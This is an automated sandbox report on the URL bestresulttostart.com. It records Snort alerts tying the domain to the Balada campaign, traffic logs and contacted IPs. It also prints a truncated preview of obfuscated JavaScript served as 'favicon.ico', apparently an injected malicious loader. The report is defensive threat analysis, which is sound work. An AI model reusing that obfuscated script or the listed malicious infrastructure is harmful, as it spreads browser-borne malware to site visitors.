Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://bestresulttostart.com

Overview

General Information

Sample URL:http://bestresulttostart.com
Analysis ID:1427642
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 1880 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4296 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1792,i,3187058256800355177,13799939537630235712,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://bestresulttostart.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:04/17/24-22:59:13.670606
SID:2051948
Source Port:56414
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/17/24-22:59:15.160588
SID:2051949
Source Port:49740
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/17/24-22:59:19.535331
SID:2051949
Source Port:49745
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/17/24-22:59:12.928077
SID:2051948
Source Port:64840
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/17/24-22:59:13.670829
SID:2051948
Source Port:53193
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/17/24-22:59:19.204500
SID:2051948
Source Port:54694
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/17/24-22:59:12.928226
SID:2051948
Source Port:65084
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/17/24-22:59:14.001015
SID:2051949
Source Port:49737
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/17/24-22:59:19.205225
SID:2051948
Source Port:62320
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results
Source: https://bestresulttostart.com/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.4:49744 version: TLS 1.2

Networking

barindex
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.4:64840 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.4:65084 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.4:56414 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.4:53193 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051949 ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com) 192.168.2.4:49737 -> 193.163.7.113:443
Source: TrafficSnort IDS: 2051949 ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com) 192.168.2.4:49740 -> 193.163.7.113:443
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.4:54694 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.4:62320 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051949 ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com) 192.168.2.4:49745 -> 193.163.7.113:443
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bestresulttostart.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bestresulttostart.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bestresulttostart.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bestresulttostart.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bestresulttostart.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: unknownDNS traffic detected: queries for: bestresulttostart.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: classification engineClassification label: mal48.win@17/5@8/4
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1792,i,3187058256800355177,13799939537630235712,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://bestresulttostart.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1792,i,3187058256800355177,13799939537630235712,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
bestresulttostart.com
193.163.7.113
truetrue
    unknown
    www.google.com
    172.253.124.106
    truefalse
      high
      fp2e7a.wpc.phicdn.net
      192.229.211.108
      truefalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://bestresulttostart.com/false
          unknown
          https://bestresulttostart.com/favicon.icotrue
            unknown
            http://bestresulttostart.com/true
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              239.255.255.250
              unknownReserved
              unknownunknownfalse
              172.253.124.106
              www.google.comUnited States
              15169GOOGLEUSfalse
              193.163.7.113
              bestresulttostart.comDenmark
              1935FR-RENATER-LIMOUSINReseauRegionalLimousinEUtrue
              IP
              192.168.2.4
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1427642
              Start date and time:2024-04-17 22:58:19 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 3m 14s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:browseurl.jbs
              Sample URL:http://bestresulttostart.com
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:7
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal48.win@17/5@8/4
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 142.250.9.113, 142.250.9.138, 142.250.9.100, 142.250.9.139, 142.250.9.102, 142.250.9.101, 74.125.136.84, 172.217.215.94, 34.104.35.123, 20.12.23.50, 96.7.245.67, 96.7.245.8, 96.7.245.41, 96.7.245.89, 96.7.245.42, 96.7.245.96, 96.7.245.50, 96.7.245.64, 96.7.245.48, 20.166.126.56, 192.229.211.108, 172.253.124.94
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, glb.sls.prod.dcat.dsp.trafficmanager.net
              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtSetInformationFile calls found.
              • VT rate limit hit for: http://bestresulttostart.com
              No simulations
              No context
              No context
              No context
              No context
              No context
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (13785)
              Category:dropped
              Size (bytes):13786
              Entropy (8bit):5.3437849678241625
              Encrypted:false
              SSDEEP:384:5rUrsylveggod/jxOPZFixd7PXMcVYznQxeth4ukT/e6WmniyiR45nwdCKpD:5rUrsylGgBdLWZFixd7PXbVYznQxeo3S
              MD5:58D15C8061659EF77D42E8C5D3FF4984
              SHA1:4FEFB78331EE102E720C03A36265F3B286DF3457
              SHA-256:709F60C4E7BE64193C1EFF6ACA024338E157DA87200E114E84B061BFED693F98
              SHA-512:B19FADFBA525AFFA4A19B99F9B204BD6C4B74BEC88CF8892B5B17F996FF79C5782680EC9B57062600483226BD58CA5893EF61B95953B206E2EE1AC009DEF2885
              Malicious:false
              Reputation:low
              Preview:(function(_0x123a19,_0x2dcd19){function _0x58b634(_0x3c6ed8,_0x102246,_0x9a1abb,_0x389661,_0x5d6061){return _0x58cd(_0x102246- -0xec,_0x3c6ed8);}function _0x15d07a(_0x1737f1,_0x448d7e,_0x3fc385,_0x235f74,_0x443957){return _0x58cd(_0x443957- -0x2e2,_0x235f74);}function _0x116976(_0x597b29,_0x2fa573,_0x3e42bd,_0x196188,_0x53fc96){return _0x58cd(_0x597b29-0x1ee,_0x53fc96);}var _0x1430f8=_0x123a19();function _0x511da3(_0xf22f,_0x15463b,_0x1f767f,_0x439083,_0x19b8cf){return _0x58cd(_0x439083-0x202,_0x1f767f);}function _0x225522(_0x6ff1da,_0x442c73,_0x470e71,_0x4c5d16,_0x19b6ad){return _0x58cd(_0x442c73-0xb2,_0x6ff1da);}while(!![]){try{var _0xa9e9da=parseInt(_0x15d07a(-0x10a,-0x110,-0x123,'Zwyr',-0x11d))/(-0x1699+-0x23*-0x97+0x1f5*0x1)+parseInt(_0x15d07a(-0xe2,-0x106,-0x12f,'qMqR',-0x102))/(0xcb+-0x9*0x2c5+0x1824)*(parseInt(_0x15d07a(-0xf7,-0x143,-0xe6,'c6gW',-0x117))/(0xced+0x3*-0xa13+0x114f))+-parseInt(_0x225522('Zwyr',0x2c6,0x2ee,0x2c9,0x302))/(0xd5d+-0x1b70+0xe17)*(-parseInt(_0x15d07a(-0
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:HTML document, ASCII text
              Category:downloaded
              Size (bytes):2569
              Entropy (8bit):5.189345850041082
              Encrypted:false
              SSDEEP:48:Sv+g8d7+CZirJpGs3kGKsljbMeiHr6Gn3kIt5NtvQ7C3kIS3kInzKxr:S+C51MHr6GrrI79KB
              MD5:6A7720F00CDB8F8EF45A710192A61129
              SHA1:49C333915A22CB5ADD86906888D96FB66C22A50A
              SHA-256:DBD92BDD8B0BD06903D4922F102B3648D42E6EA2788B5FAEA4164466A1F5CA43
              SHA-512:EAA09707EF36C0A86AD5BC7537D27125828B2ACB4D67F3DDD2D2229E4554685C907A1757E9895756D5186714384B572568E1171FDD3E51ADD848DB4BB09B699F
              Malicious:false
              Reputation:low
              URL:https://bestresulttostart.com/
              Preview:<!DOCTYPE html>.<html lang="en">..<head>...<meta charset="utf-8" />...<meta name="viewport" content="width=device-width, initial-scale=1" />...<title>Coming Soon</title>...<style>....body {.....background-color: #f5f5f5;.....margin-top: 8%;.....color: #5d5d5d;.....font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,......"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol",......"Noto Color Emoji";.....text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);.....text-align: center;....}.....h1 {.....font-size: 2.45em;.....font-weight: 700;.....color: #5d5d5d;.....letter-spacing: -0.02em;.....margin-bottom: 30px;.....margin-top: 30px;....}......container {.....width: 100%;.....margin-right: auto;.....margin-left: auto;....}......animate__animated {.....animation-duration: 1s;.....animation-fill-mode: both;....}......animate__fadeIn {.....animation-name: fadeIn;....}......info {.....color: #5594cf;.....fill: #5594cf;....}...
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (13785)
              Category:downloaded
              Size (bytes):13786
              Entropy (8bit):5.3437849678241625
              Encrypted:false
              SSDEEP:384:5rUrsylveggod/jxOPZFixd7PXMcVYznQxeth4ukT/e6WmniyiR45nwdCKpD:5rUrsylGgBdLWZFixd7PXbVYznQxeo3S
              MD5:58D15C8061659EF77D42E8C5D3FF4984
              SHA1:4FEFB78331EE102E720C03A36265F3B286DF3457
              SHA-256:709F60C4E7BE64193C1EFF6ACA024338E157DA87200E114E84B061BFED693F98
              SHA-512:B19FADFBA525AFFA4A19B99F9B204BD6C4B74BEC88CF8892B5B17F996FF79C5782680EC9B57062600483226BD58CA5893EF61B95953B206E2EE1AC009DEF2885
              Malicious:false
              Reputation:low
              URL:https://bestresulttostart.com/favicon.ico
              Preview:(function(_0x123a19,_0x2dcd19){function _0x58b634(_0x3c6ed8,_0x102246,_0x9a1abb,_0x389661,_0x5d6061){return _0x58cd(_0x102246- -0xec,_0x3c6ed8);}function _0x15d07a(_0x1737f1,_0x448d7e,_0x3fc385,_0x235f74,_0x443957){return _0x58cd(_0x443957- -0x2e2,_0x235f74);}function _0x116976(_0x597b29,_0x2fa573,_0x3e42bd,_0x196188,_0x53fc96){return _0x58cd(_0x597b29-0x1ee,_0x53fc96);}var _0x1430f8=_0x123a19();function _0x511da3(_0xf22f,_0x15463b,_0x1f767f,_0x439083,_0x19b8cf){return _0x58cd(_0x439083-0x202,_0x1f767f);}function _0x225522(_0x6ff1da,_0x442c73,_0x470e71,_0x4c5d16,_0x19b6ad){return _0x58cd(_0x442c73-0xb2,_0x6ff1da);}while(!![]){try{var _0xa9e9da=parseInt(_0x15d07a(-0x10a,-0x110,-0x123,'Zwyr',-0x11d))/(-0x1699+-0x23*-0x97+0x1f5*0x1)+parseInt(_0x15d07a(-0xe2,-0x106,-0x12f,'qMqR',-0x102))/(0xcb+-0x9*0x2c5+0x1824)*(parseInt(_0x15d07a(-0xf7,-0x143,-0xe6,'c6gW',-0x117))/(0xced+0x3*-0xa13+0x114f))+-parseInt(_0x225522('Zwyr',0x2c6,0x2ee,0x2c9,0x302))/(0xd5d+-0x1b70+0xe17)*(-parseInt(_0x15d07a(-0
              No static file info
              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              04/17/24-22:59:13.670606UDP2051948ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com)5641453192.168.2.41.1.1.1
              04/17/24-22:59:15.160588TCP2051949ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com)49740443192.168.2.4193.163.7.113
              04/17/24-22:59:19.535331TCP2051949ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com)49745443192.168.2.4193.163.7.113
              04/17/24-22:59:12.928077UDP2051948ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com)6484053192.168.2.41.1.1.1
              04/17/24-22:59:13.670829UDP2051948ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com)5319353192.168.2.41.1.1.1
              04/17/24-22:59:19.204500UDP2051948ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com)5469453192.168.2.41.1.1.1
              04/17/24-22:59:12.928226UDP2051948ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com)6508453192.168.2.41.1.1.1
              04/17/24-22:59:14.001015TCP2051949ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com)49737443192.168.2.4193.163.7.113
              04/17/24-22:59:19.205225UDP2051948ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com)6232053192.168.2.41.1.1.1
              TimestampSource PortDest PortSource IPDest IP
              Apr 17, 2024 22:59:04.313013077 CEST49675443192.168.2.4173.222.162.32
              Apr 17, 2024 22:59:13.259165049 CEST4973580192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:13.259687901 CEST4973680192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:13.463929892 CEST8049736193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:13.464150906 CEST4973680192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:13.464292049 CEST4973680192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:13.468589067 CEST8049735193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:13.468964100 CEST4973580192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:13.668433905 CEST8049736193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:13.668490887 CEST8049736193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:13.721477985 CEST4973680192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:13.924947023 CEST49675443192.168.2.4173.222.162.32
              Apr 17, 2024 22:59:14.000673056 CEST49737443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:14.000749111 CEST44349737193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:14.000842094 CEST49737443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:14.001014948 CEST49737443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:14.001032114 CEST44349737193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:14.432419062 CEST44349737193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:14.432749033 CEST49737443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:14.432805061 CEST44349737193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:14.434032917 CEST44349737193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:14.434114933 CEST49737443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:14.435137033 CEST49737443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:14.435214043 CEST44349737193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:14.435359955 CEST49737443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:14.435374975 CEST44349737193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:14.475553036 CEST49737443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:14.826878071 CEST44349737193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:14.826975107 CEST44349737193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:14.827039957 CEST49737443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:14.827090979 CEST44349737193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:14.827265978 CEST44349737193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:14.827322960 CEST49737443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:14.959733009 CEST49737443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:14.959772110 CEST44349737193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:15.159997940 CEST49740443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:15.160036087 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:15.160092115 CEST49740443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:15.160588026 CEST49740443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:15.160603046 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:15.595547915 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:15.596165895 CEST49740443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:15.596178055 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:15.597276926 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:15.598324060 CEST49740443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:15.598480940 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:15.598933935 CEST49740443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:15.644119024 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:16.013052940 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:16.013192892 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:16.013242960 CEST49740443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:16.013257980 CEST44349740193.163.7.113192.168.2.4
